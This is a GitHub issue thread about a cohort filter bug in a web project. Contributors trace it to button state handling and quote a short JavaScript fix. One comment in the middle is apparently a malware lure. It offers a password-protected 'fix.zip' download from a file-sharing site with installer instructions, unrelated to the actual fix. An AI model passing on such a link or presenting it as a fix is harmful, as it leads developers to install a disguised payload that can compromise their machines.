### ISSUE TITLE
bug: The cohort 2.0 and cohort 3.0 filter is bugged

### ISSUE THREAD

**Issue by HarshK200** [code100x/daily-code#590]
**Describe the bug**
bug: The cohort 2.0 and cohort 3.0 filter is bugged

**To Reproduce**
1. Click on Cohort 2.0 filter
2. Click back on cohort 3.0 filter it no longer works (probable some state issue onclick problem?)

**Expected behavior**
On clicking the filter buttons the content should filter as cohort 2 notes and cohort 3 note

**Screenshots or GIFs**

https://github.com/user-attachments/assets/c591b5d4-e9db-40fa-a6ff-de57b85acba5

**Info (please complete the following information):**
 - Browser : chrome

**Additional context**

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gurveer1510** [comment]
I tried to fix it, first I thought the state switching of the buttons could be wrong, then I made some logs that what data is database sending to filter out AND the field "cohort" which should have 2 or 3 has 0 in all entries idk if its only the case with seeding data or something else.
But when I update the Track table and made some records have "cohort" 2 or 3 then the filtering was working fine.

![image](https://github.com/user-attachments/assets/d892bdeb-efa0-4441-8bff-22be31a3db02)
the cohort field is set by default to 0

So,
![image](https://github.com/user-attachments/assets/dd7f6834-07c7-40e2-bf64-1c8d3cfb0b35)
this check will always give empty object.

![image](https://github.com/user-attachments/assets/8070b761-428b-4ce7-9513-ef2e12ba0cf2)
when made changes in the database.

or am I missing something.

**Comment by Ashutoshpadhi629** [comment]
@Gurveer1510 , in production the value is not zero , the fix here is to add the logic to change the state of both the buttons . i already fixed it in #588 
```javascript
              setCohort3(!cohort3);
              cohort2 && setCohort2(!cohort2);

**Comment by Gurveer1510** [comment]
> @Gurveer1510 , in production the value is not zero , the fix here is to add the logic to change the state of both the buttons . i already fixed it in #588
> 
> ```js
>               setCohort3(!cohort3);
>               cohort2 && setCohort2(!cohort2);
> ```

Ohh, I fixed the state change bug too
![image](https://github.com/user-attachments/assets/c7fb176e-2020-4117-a089-c58c14d3ee42)

but I thought it was something big. 😂

**Comment by HarshK200** [comment]
The main branch was reverted so no issue?
